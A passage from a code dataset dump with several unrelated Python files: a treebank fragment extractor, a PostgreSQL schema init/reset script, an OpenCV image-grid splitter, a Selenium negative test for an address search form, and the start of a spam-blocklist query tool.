single-process '\n\t\t\t\t'mode. 
Use the xargs command for multi-processing.')\n\treadstdin = None\n\tfor n, fname in enumerate(args):\n\t\tif fname == '-':\n\t\t\tif numproc != 1:\n\t\t\t\t# write to temp file so that contents can be read\n\t\t\t\t# in multiple processes\n\t\t\t\tif readstdin is not None:\n\t\t\t\t\traise ValueError('can only read from stdin once.')\n\t\t\t\twith tempfile.NamedTemporaryFile(delete=False) as tmp:\n\t\t\t\t\ttmp.write(open(sys.stdin.fileno(), 'rb').read())\n\t\t\t\t\targs[n] = tmp.name\n\t\t\t\treadstdin = n\n\t\telif not os.path.exists(fname):\n\t\t\traise ValueError('not found: %r' % fname)\n\tif PARAMS['complete']:\n\t\tif len(args) < 2:\n\t\t\traise ValueError('need at least two treebanks with --complete.')\n\t\tif PARAMS['twoterms'] or PARAMS['adjacent']:\n\t\t\traise ValueError('--twoterms and --adjacent are incompatible '\n\t\t\t\t\t'with --complete.')\n\t\tif PARAMS['approx'] or PARAMS['nofreq']:\n\t\t\traise ValueError('--complete is incompatible with --nofreq '\n\t\t\t\t\t'and --approx')\n\n\tlevel = logging.WARNING if PARAMS['quiet'] else logging.DEBUG\n\tlogging.basicConfig(level=level, format='%(message)s')\n\tif PARAMS['debug'] and numproc > 1:\n\t\tlogger = multiprocessing.log_to_stderr()\n\t\tlogger.setLevel(multiprocessing.SUBDEBUG)\n\n\tlogging.info('Disco-DOP Fragment Extractor')\n\n\tlogging.info('parameters:\\n%s', '\\n'.join(' %s:\\t%r' % kv\n\t\tfor kv in sorted(PARAMS.items())))\n\tlogging.info('\\n'.join('treebank%d: %s' % (n + 1, a)\n\t\tfor n, a in enumerate(args)))\n\n\tif numproc == 1 and batchdir:\n\t\tbatch(batchdir, args, limit, encoding, '--debin' in opts)\n\telse:\n\t\tfragmentkeys, counts = regular(args, numproc, limit, encoding)\n\t\tout = (io.open(opts['-o'], 'w', encoding=encoding)\n\t\t\t\tif '-o' in opts else None)\n\t\tif '--debin' in opts:\n\t\t\tfragmentkeys = debinarize(fragmentkeys)\n\t\tprintfragments(fragmentkeys, counts, out=out)\n\tif readstdin is not None:\n\t\tos.unlink(args[readstdin])\n\n\ndef regular(filenames, numproc, limit, encoding):\n\t\"\"\"non-batch processing. 
multiprocessing optional.\"\"\"\n\tmult = 1\n\tif PARAMS['approx']:\n\t\tfragments = defaultdict(int)\n\telse:\n\t\tfragments = {}\n\t# detect corpus reading errors in this process (e.g., wrong encoding)\n\tinitworker(\n\t\t\tfilenames[0],\n\t\t\tfilenames[1] if len(filenames) == 2 else None,\n\t\t\tlimit, encoding)\n\tif numproc == 1:\n\t\tmymap, myworker = map, worker\n\telse: # multiprocessing, start worker processes\n\t\tpool = multiprocessing.Pool(\n\t\t\t\tprocesses=numproc, initializer=initworker,\n\t\t\t\tinitargs=(filenames[0], filenames[1] if len(filenames) == 2\n\t\t\t\t\telse None, limit, encoding))\n\t\tmymap, myworker = pool.imap, mpworker\n\tnumtrees = (PARAMS['trees1'].len if limit is None\n\t\t\telse min(PARAMS['trees1'].len, limit))\n\n\tif PARAMS['complete']:\n\t\ttrees1, trees2 = PARAMS['trees1'], PARAMS['trees2']\n\t\tfragmentkeys, bitsets = _fragments.completebitsets(\n\t\t\t\ttrees1, PARAMS['vocab'],\n\t\t\t\tmax(trees1.maxnodes, trees2.maxnodes), PARAMS['disc'])\n\telse:\n\t\tif len(filenames) == 1:\n\t\t\twork = workload(numtrees, mult, numproc)\n\t\telse:\n\t\t\tchunk = numtrees // (mult * numproc) + 1\n\t\t\twork = [(a, a + chunk) for a in range(0, numtrees, chunk)]\n\t\tif numproc != 1:\n\t\t\tlogging.info('work division:\\n%s', '\\n'.join(' %s:\\t%r' % kv\n\t\t\t\tfor kv in sorted(dict(numchunks=len(work), mult=mult).items())))\n\t\tdowork = mymap(myworker, work)\n\t\tfor results in dowork:\n\t\t\tif PARAMS['approx']:\n\t\t\t\tfor frag, x in results.items():\n\t\t\t\t\tfragments[frag] += x\n\t\t\telse:\n\t\t\t\tfragments.update(results)\n\t\tfragmentkeys = list(fragments)\n\t\tbitsets = [fragments[a] for a in fragmentkeys]\n\tif PARAMS['nofreq']:\n\t\tcounts = None\n\telif PARAMS['approx']:\n\t\tcounts = [fragments[a] for a in fragmentkeys]\n\telse:\n\t\ttask = 'indices' if PARAMS['indices'] else 'counts'\n\t\tlogging.info('dividing work for exact %s', task)\n\t\tcountchunk = len(bitsets) // numproc + 1\n\t\twork = list(range(0, len(bitsets), countchunk))\n\t\twork = [(n, len(work), bitsets[a:a + countchunk])\n\t\t\t\tfor n, a in enumerate(work)]\n\t\tcounts = []\n\t\tlogging.info('getting exact %s', task)\n\t\tfor a in mymap(\n\t\t\t\texactcountworker if numproc == 1 else mpexactcountworker, work):\n\t\t\tcounts.extend(a)\n\tif PARAMS['cover']:\n\t\tmaxdepth, maxfrontier = PARAMS['cover']\n\t\tbefore = len(fragmentkeys)\n\t\tcover = _fragments.allfragments(PARAMS['trees1'], PARAMS['vocab'],\n\t\t\t\tmaxdepth, maxfrontier, PARAMS['disc'], PARAMS['indices'])\n\t\tfor a in cover:\n\t\t\tif a not in fragments:\n\t\t\t\tfragmentkeys.append(a)\n\t\t\t\tcounts.append(cover[a])\n\t\tlogging.info('merged %d cover fragments '\n\t\t\t\t'up to depth %d with max %d frontier non-terminals.',\n\t\t\t\tlen(fragmentkeys) - before, maxdepth, maxfrontier)\n\tif numproc != 1:\n\t\tpool.close()\n\t\tpool.join()\n\t\tdel dowork, pool\n\treturn fragmentkeys, counts\n\n\ndef batch(outputdir, filenames, limit, encoding, debin):\n\t\"\"\"batch processing: three or more treebanks specified.\n\n\tCompares the first treebank to all others, and writes the results\n\tto ``outputdir/A_B`` where ``A`` and ``B`` are the respective filenames.\n\tCounts/indices are from the other (B) treebanks.\n\tThere are at least 2 use cases for this:\n\n\t1. Comparing one treebank to a series of others. The first treebank will\n\t\tonly be loaded once.\n\t2. 
In combination with ``--complete``, the first treebank is a set of\n\t\tfragments used as queries on the other treebanks specified.\"\"\"\n\tinitworker(filenames[0], None, limit, encoding)\n\ttrees1 = PARAMS['trees1']\n\tmaxnodes = trees1.maxnodes\n\tif PARAMS['complete']:\n\t\tfragmentkeys, bitsets = _fragments.completebitsets(\n\t\t\t\ttrees1, PARAMS['vocab'],\n\t\t\t\tmaxnodes, PARAMS['disc'])\n\t\tfragments = True\n\telif PARAMS['approx']:\n\t\tfragments = defaultdict(int)\n\telse:\n\t\tfragments = {}\n\tfor filename in filenames[1:]:\n\t\tPARAMS.update(read2ndtreebank(filename, PARAMS['vocab'],\n\t\t\tPARAMS['fmt'], limit, encoding))\n\t\ttrees2 = PARAMS['trees2']\n\t\tif not PARAMS['complete']:\n\t\t\tfragments = _fragments.extractfragments(trees1, 0, 0,\n\t\t\t\t\tPARAMS['vocab'], trees2, disc=PARAMS['disc'],\n\t\t\t\t\tdebug=PARAMS['debug'], approx=PARAMS['approx'],\n\t\t\t\t\ttwoterms=PARAMS['twoterms'], adjacent=PARAMS['adjacent'])\n\t\t\tfragmentkeys = list(fragments)\n\t\t\tbitsets = [fragments[a] for a in fragmentkeys]\n\t\t\tmaxnodes = max(trees1.maxnodes, trees2.maxnodes)\n\t\tcounts = None\n\t\tif PARAMS['approx'] or not fragments:\n\t\t\tcounts = fragments.values()\n\t\telif not PARAMS['nofreq']:\n\t\t\tlogging.info('getting %s for %d fragments',\n\t\t\t\t\t'indices of occurrence' if PARAMS['indices']\n\t\t\t\t\telse 'exact counts', len(bitsets))\n\t\t\tcounts = _fragments.exactcounts(bitsets, trees1, trees2,\n\t\t\t\t\tindices=PARAMS['indices'],\n\t\t\t\t\tmaxnodes=maxnodes)\n\t\toutputfilename = '%s/%s_%s' % (outputdir,\n\t\t\t\tos.path.basename(filenames[0]), os.path.basename(filename))\n\t\tout = io.open(outputfilename, 'w', encoding=encoding)\n\t\tif debin:\n\t\t\tfragmentkeys = debinarize(fragmentkeys)\n\t\tprintfragments(fragmentkeys, counts, out=out)\n\t\tlogging.info('wrote to %s', outputfilename)\n\n\ndef readtreebanks(filename1, filename2=None, fmt='bracket',\n\t\tlimit=None, encoding='utf8'):\n\t\"\"\"Read one or two treebanks.\"\"\"\n\tvocab = Vocabulary()\n\ttrees1 = _fragments.readtreebank(filename1, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees2 = _fragments.readtreebank(filename2, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees1.indextrees(vocab)\n\tif trees2:\n\t\ttrees2.indextrees(vocab)\n\treturn dict(trees1=trees1, trees2=trees2, vocab=vocab)\n\n\ndef read2ndtreebank(filename2, vocab, fmt='bracket',\n\t\tlimit=None, encoding='utf8'):\n\t\"\"\"Read a second treebank.\"\"\"\n\ttrees2 = _fragments.readtreebank(filename2, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees2.indextrees(vocab)\n\tlogging.info('%r: %d trees; %d nodes (max %d); '\n\t\t\t'word tokens: %d\\n%r',\n\t\t\tfilename2, len(trees2), trees2.numnodes, trees2.maxnodes,\n\t\t\ttrees2.numwords, PARAMS['vocab'])\n\treturn dict(trees2=trees2, vocab=vocab)\n\n\ndef initworker(filename1, filename2, limit, encoding):\n\t\"\"\"Read treebanks for this worker.\n\n\tWe do this separately for each process under the assumption that this is\n\tadvantageous with a NUMA architecture.\"\"\"\n\tPARAMS.update(readtreebanks(filename1, filename2,\n\t\t\tlimit=limit, fmt=PARAMS['fmt'], encoding=encoding))\n\ttrees1 = PARAMS['trees1']\n\tif PARAMS['debug']:\n\t\tprint('\\nproductions:')\n\t\tfor a, b in sorted([(PARAMS['vocab'].prodrepr(n), n)\n\t\t\t\tfor n in range(len(PARAMS['vocab'].prods))],\n\t\t\t\tkey=lambda x: x[1]):\n\t\t\tprint('%d. 
%s' % (b, a))\n\t\tprint('treebank 1:')\n\t\tfor n in range(trees1.len):\n\t\t\ttrees1.printrepr(n, PARAMS['vocab'])\n\tif not trees1:\n\t\traise ValueError('treebank1 empty.')\n\tm = 'treebank1: %d trees; %d nodes (max: %d); %d word tokens.\\n' % (\n\t\t\ttrees1.len, trees1.numnodes, trees1.maxnodes, trees1.numwords)\n\tif filename2:\n\t\ttrees2 = PARAMS['trees2']\n\t\tif PARAMS['debug']:\n\t\t\tprint('treebank 2:')\n\t\t\tfor n in range(trees2.len):\n\t\t\t\ttrees2.printrepr(n, PARAMS['vocab'])\n\t\tif not trees2:\n\t\t\traise ValueError('treebank2 empty.')\n\t\tm += 'treebank2: %d trees; %d nodes (max %d); %d word tokens.\\n' % (\n\t\t\t\ttrees2.len, trees2.numnodes, trees2.maxnodes, trees2.numwords)\n\tlogging.info('%s%r', m, PARAMS['vocab'])\n\n\ndef initworkersimple(trees, sents, trees2=None, sents2=None):\n\t\"\"\"Initialization for a worker in which a treebank was already loaded.\"\"\"\n\tPARAMS.update(_fragments.getctrees(zip(trees, sents),\n\t\t\tNone if trees2 is None else zip(trees2, sents2)))\n\tassert PARAMS['trees1'], PARAMS['trees1']\n\n\n@workerfunc\ndef mpworker(interval):\n\t\"\"\"Worker function for fragment extraction (multiprocessing wrapper).\"\"\"\n\treturn worker(interval)\n\n\ndef worker(interval):\n\t\"\"\"Worker function for fragment extraction.\"\"\"\n\toffset, end = interval\n\ttrees1 = PARAMS['trees1']\n\ttrees2 = PARAMS['trees2']\n\tassert offset < trees1.len\n\tresult = {}\n\tresult = _fragments.extractfragments(trees1, offset, end,\n\t\t\tPARAMS['vocab'], trees2, approx=PARAMS['approx'],\n\t\t\tdisc=PARAMS['disc'],\n\t\t\tdebug=PARAMS['debug'], twoterms=PARAMS['twoterms'],\n\t\t\tadjacent=PARAMS['adjacent'])\n\tlogging.debug('finished %d--%d', offset, end)\n\treturn result\n\n\n@workerfunc\ndef mpexactcountworker(args):\n\t\"\"\"Worker function for counts (multiprocessing wrapper).\"\"\"\n\treturn exactcountworker(args)\n\n\ndef exactcountworker(args):\n\t\"\"\"Worker function for counting of fragments.\"\"\"\n\tn, m, bitsets = args\n\ttrees1 = PARAMS['trees1']\n\tif PARAMS['complete']:\n\t\tresults = _fragments.exactcounts(bitsets, trees1, PARAMS['trees2'],\n\t\t\t\tindices=PARAMS['indices'])\n\t\tlogging.debug('complete matches chunk %d of %d', n + 1, m)\n\t\treturn results\n\tresults = _fragments.exactcounts(\n\t\t\tbitsets, trees1, trees1, indices=PARAMS['indices'])\n\tif PARAMS['indices']:\n\t\tlogging.debug('exact indices chunk %d of %d', n + 1, m)\n\telse:\n\t\tlogging.debug('exact counts chunk %d of %d', n + 1, m)\n\treturn results\n\n\ndef workload(numtrees, mult, numproc):\n\t\"\"\"Calculate an even workload.\n\n\tWhen *n* trees are compared against themselves, ``n * (n - 1)`` total\n\tcomparisons are made. 
Each tree ``m`` has to be compared to all trees ``x``\n\tsuch that ``m < x <= n``\n\t(meaning there are more comparisons for lower *m*).\n\n\t:returns: a sequence of ``(start, end)`` intervals such that\n\t\tthe number of comparisons is approximately balanced.\"\"\"\n\t# could base on number of nodes as well.\n\tif numproc == 1:\n\t\treturn [(0, numtrees)]\n\t# here chunk is the number of tree pairs that will be compared\n\tgoal = togo = total = 0.5 * numtrees * (numtrees - 1)\n\tchunk = total // (mult * numproc) + 1\n\tgoal -= chunk\n\tresult = []\n\tlast = 0\n\tfor n in range(1, numtrees):\n\t\ttogo -= numtrees - n\n\t\tif togo <= goal:\n\t\t\tgoal -= chunk\n\t\t\tresult.append((last, n))\n\t\t\tlast = n\n\tif last < numtrees:\n\t\tresult.append((last, numtrees))\n\treturn result\n\n\ndef recurringfragments(trees, sents, numproc=1, disc=True,\n\t\tindices=True, maxdepth=1,\n\t\tmaxfrontier=999):\n\t\"\"\"Get recurring fragments with exact counts in a single treebank.\n\n\t:returns: a dictionary whose keys are fragments as strings, and\n\t\tindices as values. When ``disc`` is ``True``, keys are of the form\n\t\t``(frag, sent)`` where ``frag`` is a unicode string, and ``sent``\n\t\tis a list of words as unicode strings; when ``disc`` is ``False``, keys\n\t\tare of the form ``frag`` where ``frag`` is a unicode string.\n\t:param trees: a sequence of binarized Tree objects, with indices as leaves.\n\t:param sents: the corresponding sentences (lists of strings).\n\t:param numproc: number of processes to use; pass 0 to use detected # CPUs.\n\t:param disc: when disc=True, assume trees with discontinuous constituents;\n\t\tresulting fragments will be of the form (frag, sent);\n\t\totherwise fragments will be strings with words as leaves.\n\t:param indices: when False, return integer counts instead of indices.\n\t:param maxdepth: when > 0, add 'cover' fragments to result, corresponding\n\t\tto all fragments up to given depth; pass 0 to disable.\n\t:param maxfrontier: maximum number of frontier non-terminals (substitution\n\t\tsites) in cover fragments; a limit of 0 only gives fragments that\n\t\tbottom out in terminals; the default 999 is unlimited for practical\n\t\tpurposes.\"\"\"\n\tif numproc == 0:\n\t\tnumproc = cpu_count()\n\tnumtrees = len(trees)\n\tif not numtrees:\n\t\traise ValueError('no trees.')\n\tmult = 1 # 3 if numproc > 1 else 1\n\tfragments = {}\n\ttrees = trees[:]\n\twork = workload(numtrees, mult, numproc)\n\tPARAMS.update(disc=disc, indices=indices, approx=False, complete=False,\n\t\t\tdebug=False, adjacent=False, twoterms=None)\n\tinitworkersimple(trees, list(sents))\n\tif numproc == 1:\n\t\tmymap, myworker = map, worker\n\telse:\n\t\tlogging.info('work division:\\n%s', '\\n'.join(' %s: %r' % kv\n\t\t\t\tfor kv in sorted(dict(numchunks=len(work),\n\t\t\t\t\tnumproc=numproc).items())))\n\t\t# start worker processes\n\t\tpool = multiprocessing.Pool(\n\t\t\t\tprocesses=numproc, initializer=initworkersimple,\n\t\t\t\tinitargs=(trees, list(sents)))\n\t\tmymap, myworker = pool.map, mpworker\n\t# collect recurring fragments\n\tlogging.info('extracting recurring fragments')\n\tfor a in mymap(myworker, work):\n\t\tfragments.update(a)\n\tfragmentkeys = list(fragments)\n\tbitsets = [fragments[a] for a in fragmentkeys]\n\tcountchunk = len(bitsets) // numproc + 1\n\twork = list(range(0, len(bitsets), countchunk))\n\twork = [(n, len(work), bitsets[a:a + countchunk])\n\t\t\tfor n, a in enumerate(work)]\n\tlogging.info('getting exact counts for %d fragments', len(bitsets))\n\tcounts = 
[]\n\tfor a in mymap(\n\t\t\texactcountworker if numproc == 1 else mpexactcountworker, work):\n\t\tcounts.extend(a)\n\t# add all fragments up to a given depth\n\tif maxdepth:\n\t\tcover = _fragments.allfragments(PARAMS['trees1'], PARAMS['vocab'],\n\t\t\t\tmaxdepth, maxfrontier, disc, indices)\n\t\tbefore = len(fragmentkeys)\n\t\tfor a in cover:\n\t\t\tif a not in fragments:\n\t\t\t\tfragmentkeys.append(a)\n\t\t\t\tcounts.append(cover[a])\n\t\tlogging.info('merged %d cover fragments '\n\t\t\t\t'up to depth %d with max %d frontier non-terminals.',\n\t\t\t\tlen(fragmentkeys) - before, maxdepth, maxfrontier)\n\tif numproc != 1:\n\t\tpool.close()\n\t\tpool.join()\n\t\tdel pool\n\tlogging.info('found %d fragments', len(fragmentkeys))\n\treturn dict(zip(fragmentkeys, counts))\n\n\ndef allfragments(trees, sents, maxdepth, maxfrontier=999):\n\t\"\"\"Return all fragments up to a certain depth, # frontiers.\"\"\"\n\tPARAMS.update(disc=True, indices=True, approx=False, complete=False,\n\t\t\tdebug=False, adjacent=False, twoterms=None)\n\tinitworkersimple(trees, list(sents))\n\treturn _fragments.allfragments(PARAMS['trees1'],\n\t\t\tPARAMS['vocab'], maxdepth, maxfrontier,\n\t\t\tdisc=PARAMS['disc'], indices=PARAMS['indices'])\n\n\ndef altrepr(a):\n\t\"\"\"Rewrite bracketed tree to alternative format.\n\n\tReplace double quotes with double single quotes: \" -> ''\n\tQuote terminals with double quotes terminal: -> \"terminal\"\n\tRemove parentheses around frontier nodes: (NN ) -> NN\n\n\t>>> print(altrepr('(NP (DT a) (NN ))'))\n\t(NP (DT \"a\") NN)\n\t\"\"\"\n\treturn FRONTIERRE.sub(r'\\1', TERMRE.sub(r'(\\1 \"\\2\")', a.replace('\"', \"''\")))\n\n\ndef debinarize(fragments):\n\t\"\"\"Debinarize fragments; fragments that fail to debinarize left as-is.\"\"\"\n\tresult = []\n\tfor origfrag in fragments:\n\t\tfrag, sent = (discbrackettree(origfrag) if PARAMS['disc']\n\t\t\t\telse brackettree(origfrag, detectdisc=False))\n\t\ttry:\n\t\t\tfrag = writetree(unbinarize(frag), sent, 0,\n\t\t\t\t\t'discbracket' if PARAMS['disc'] else 'bracket').strip()\n\t\texcept Exception: # pylint: disable=broad-except\n\t\t\tresult.append(origfrag)\n\t\telse:\n\t\t\tresult.append(frag)\n\treturn result\n\n\ndef printfragments(fragments, counts, out=None):\n\t\"\"\"Dump fragments to standard output or some other file object.\"\"\"\n\tif out is None:\n\t\tout = sys.stdout\n\t\tif sys.stdout.encoding is None:\n\t\t\tout = codecs.getwriter('utf8')(out)\n\tif PARAMS['alt']:\n\t\tfor n, a in enumerate(fragments):\n\t\t\tfragments[n] = altrepr(a)\n\tif PARAMS['complete']:\n\t\tlogging.info('total number of matches: %d',\n\t\t\t\tsum(sum(a) for a in counts)\n\t\t\t\tif PARAMS['indices'] else sum(counts))\n\telse:\n\t\tlogging.info('number of fragments: %d', len(fragments))\n\tif PARAMS['nofreq']:\n\t\tfor a in fragments:\n\t\t\tout.write(a + '\\n')\n\t\treturn\n\t# a frequency of 0 is normal when counting occurrences of given fragments\n\t# in a second treebank\n\tif PARAMS['complete']:\n\t\tthreshold = 0\n\t\tzeroinvalid = False\n\t# a frequency of 1 is normal when comparing two treebanks\n\t# or when non-recurring fragments are added\n\telif PARAMS.get('trees2') or PARAMS['cover'] or PARAMS['approx']:\n\t\tthreshold = 0\n\t\tzeroinvalid = True\n\telse: # otherwise, raise alarm.\n\t\tthreshold = 1\n\t\tzeroinvalid = True\n\tif PARAMS['indices']:\n\t\tfor a, theindices in zip(fragments, counts):\n\t\t\tif len(theindices) > threshold:\n\t\t\t\tout.write('%s\\t%s\\n' % (a,\n\t\t\t\t\t[n for n in theindices\n\t\t\t\t\t\tif n - 1 in 
theindices or n + 1 in theindices]\n\t\t\t\t\tif PARAMS['adjacent'] else\n\t\t\t\t\tstr(theindices)[len(\"array('I', \"):-len(')')]))\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=1: %r' % a)\n\telif PARAMS['relfreq']:\n\t\tsums = defaultdict(int)\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tif freq > threshold:\n\t\t\t\tsums[a[1:a.index(' ')]] += freq\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=%d: %r' % (\n\t\t\t\t\tfreq, a))\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tout.write('%s\\t%d/%d\\n' % (\n\t\t\t\ta, freq, sums[a[1:a.index(' ')]]))\n\telse:\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tif freq > threshold:\n\t\t\t\tout.write('%s\\t%d\\n' % (a, freq))\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=1: %r' % a)\n\n\ndef cpu_count():\n\t\"\"\"Return number of CPUs or 1.\"\"\"\n\ttry:\n\t\treturn multiprocessing.cpu_count()\n\texcept NotImplementedError:\n\t\treturn 1\n\n\ndef test():\n\t\"\"\"Demonstration of fragment extractor.\"\"\"\n\tmain('--fmt=export alpinosample.export'.split())\n\n\n__all__ = ['main', 'regular', 'batch', 'readtreebanks', 'read2ndtreebank',\n\t\t'initworker', 'initworkersimple', 'worker', 'exactcountworker',\n\t\t'workload', 'recurringfragments', 'allfragments', 'debinarize',\n\t\t'printfragments', 'altrepr', 'cpu_count']\n","repo_name":"andreasvc/disco-dop","sub_path":"discodop/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":21251,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"} +{"seq_id":"7283058636","text":"import argparse\nimport configparser\nimport os\nfrom typing import Any, Optional, Sequence, Tuple\n\nimport psycopg2\nfrom psycopg2.extras import execute_values\n\nCOMMANDS = [\"init\", \"reset\", \"destroy\"]\n\n\ndef get_db(\n conf: configparser.ConfigParser, superuser: Optional[bool] = False\n) -> psycopg2.extensions.connection:\n cfg_section = \"ingest\" if superuser else \"postgresql\"\n dbname = conf[cfg_section][\"database\"]\n user = conf[cfg_section][\"user\"]\n password = conf[cfg_section].get(\"password\", None)\n host = conf[cfg_section][\"host\"]\n port = conf[cfg_section][\"port\"]\n conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host, port=port)\n return conn\n\n\ndef clear_db(conf: configparser.ConfigParser) -> None:\n sql = \"\"\"\n DROP SCHEMA IF EXISTS mars CASCADE;\n DROP USER IF EXISTS mars_user;\n \"\"\"\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n cur.execute(sql)\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error:\", error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef init_db(conf: configparser.ConfigParser, schema_path: str) -> None:\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n\n with open(schema_path, \"r\") as sql:\n cur.execute(sql.read(), (conf[\"postgresql\"][\"password\"],))\n\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error:\", error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef insert_many(\n conf: configparser.ConfigParser, insert_sql: str, data: Sequence[Tuple[Any, ...]]\n) -> None:\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n execute_values(cur, insert_sql, data, page_size=1000)\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error: \", error)\n 
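# Descriptive aside, not in the original source: psycopg2's execute_values() used above expands a single INSERT ... VALUES %s template with batches of rows, here at most 1000 rows per round-trip via page_size; a hypothetical call looks like execute_values(cur, 'INSERT INTO t (a, b) VALUES %s', [(1, 'x'), (2, 'y')]).\n    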
finally:\n if conn is not None:\n conn.close()\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"command\", choices=COMMANDS)\n parser.add_argument(\"--config\", help=\"Path to config file.\", default=\"config.ini\", type=str)\n args = parser.parse_args()\n\n config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n config.read(args.config)\n\n this_file_path = os.path.dirname(os.path.realpath(__file__))\n schema_file = \"schema.sql\"\n schema_full_path = os.path.join(this_file_path, schema_file)\n\n if args.command == \"init\":\n init_db(config, schema_full_path)\n elif args.command == \"reset\":\n clear_db(config)\n init_db(config, schema_full_path)\n elif args.command == \"destroy\":\n clear_db(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"appaccess/LAMA-CHI2022","sub_path":"mars/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23648246514","text":"import cv2\n\ngridWidth = 3\ngridHeight = 3\n\nimg = cv2.imread(\"../Resources/cat.jpg\")\nheight, width = img.shape[:2]\n\nframeWidth = width / gridWidth\nframeHeight = height / gridHeight\n\ncv2.imshow(\"Image\", img)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\nfor x in range(0, gridWidth):\n for y in range(0, gridHeight):\n frame = img[int(frameHeight * y) : int(frameHeight * (y + 1)), int(frameWidth * x) : int(frameWidth * (x + 1))]\n cv2.imshow(f\"{x}, {y}\", frame)\n cv2.imwrite(f\"Results/{y} {x}.jpg\", frame)\n\ncv2.waitKey()","repo_name":"AmXLoVE/robototehnika","sub_path":"Homework1/OpencvTest/Task 1/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28991737836","text":"import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nfrom selenium_config import get_path\n\n\nclass NegativeTest(unittest.TestCase):\n address_good_KC = ['1724 Beacon Way SE Renton, WA 98058', '1925 N 170th St Shoreline, WA 98133']\n address_bad = ['fjweogrgjrgl;jjegjegjgjlgjjgl;jgljgslj', '3000 Royal Hills Dr SE Renton, WA 98058, apt 1d, apt 1d', \\\n '3000 Royal Hills Dr SE Renton WA 98058 apt 1d', \\\n '904 Hiawatha Pl S, Seattle, apt 1C, apt 1C, WA 98144', '', \\\n 'iosfi iosejfdujfi esofjedsj eofe 9898908 kiefkljkj 9898', \\\n '($(*$(#$*#*%(#@*@*!($(*%$*%(*$*$(**!@(*$@(!*$(*(*($*@$*!(@*$', \\\n '()*(* )(_* )* )_()()( )(((( ', \\\n '3000 Royal Hills Dr SE Renton WA 98058 apt 1d apt 1d'\n ]\n address_good = ['8105 SE Henderson St Portland, OR 97206']\n zip_good = ['98058', '98053']\n\n @classmethod\n def setUp(inst):\n options = Options() # set custom paths\n options.binary_location = get_path().crome_path # set custom paths\n inst.driver = webdriver.Chrome(chrome_options=options,\n executable_path=get_path().webdriver_path, ) # set custom paths\n inst.driver.implicitly_wait(30)\n inst.driver.maximize_window()\n # navigate to the application home page\n inst.driver.get(get_path().app_path) # get the homepage\n\n def test_search_by_address_negative(self):\n # self.driver.execute_script(\"alert('This is an alert');\")\n res = True\n for el in self.address_bad:\n self.search_field = self.driver.find_element_by_name('address') # 
find_element_by_name\n self.search_field.send_keys(el) # input address\n self.search_field.submit() # press search\n if not self.is_element_present(By.CLASS_NAME, \"price\"):\n res = False\n print(\"address=\", el)\n break\n else:\n time.sleep(1)\n self.driver.implicitly_wait(5)\n self.driver.get(get_path().app_path)\n self.assertTrue(res)\n\n @classmethod\n def tearDown(inst):\n # close the browser window\n inst.driver.quit()\n\n def is_element_present(self, how, what):\n \"\"\"\n Helper method to confirm the presence of an element on page\n :params how: By locator type\n :params what: locator value\n \"\"\"\n try:\n self.driver.find_element(by=how, value=what)\n except NoSuchElementException:\n return False\n return True\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"huiyuandiknow/Home_Data_App","sub_path":"tests/test_negative.py","file_name":"test_negative.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"37787663928","text":"import argparse\nimport dataclasses\nimport json\nimport sys\n\nfrom typing import Any, Callable, Dict, List, Tuple, Union # noqa: H301\n\nfrom spahau import defs\nfrom spahau import query\nfrom spahau import response\n\n\nResult = Union[str, response.Response, List[response.Response]]\n\nConfigHandler = Callable[[defs.Config, defs.IPAddress], Result]\n\n\nSELFTEST_DATA_DEFS: Dict[str, List[str]] = {\n \"127.0.0.1\": [],\n \"127.0.0.2\": [\"127.0.0.2\", \"127.0.0.4\", \"127.0.0.10\"],\n}\n\nSELFTEST_DATA = {\n defs.IPAddress.parse(name): [\n response.response_desc(defs.IPAddress.parse(item)) for item in value\n ]\n for name, value in SELFTEST_DATA_DEFS.items()\n}\n\n\ndef cmd_describe(_cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Describe the specified RBL return codes.\"\"\"\n return response.response_desc(address)\n\n\ndef cmd_show_hostname(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Build and display the hostname for the query.\"\"\"\n return query.get_hostname(cfg, address)\n\n\ndef cmd_selftest(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Run a self-test.\"\"\"\n expected = SELFTEST_DATA.get(address)\n if expected is None:\n sys.exit(f\"Unknown selftest address '{address}'\")\n\n if not cfg.json:\n print(\n f\"Querying 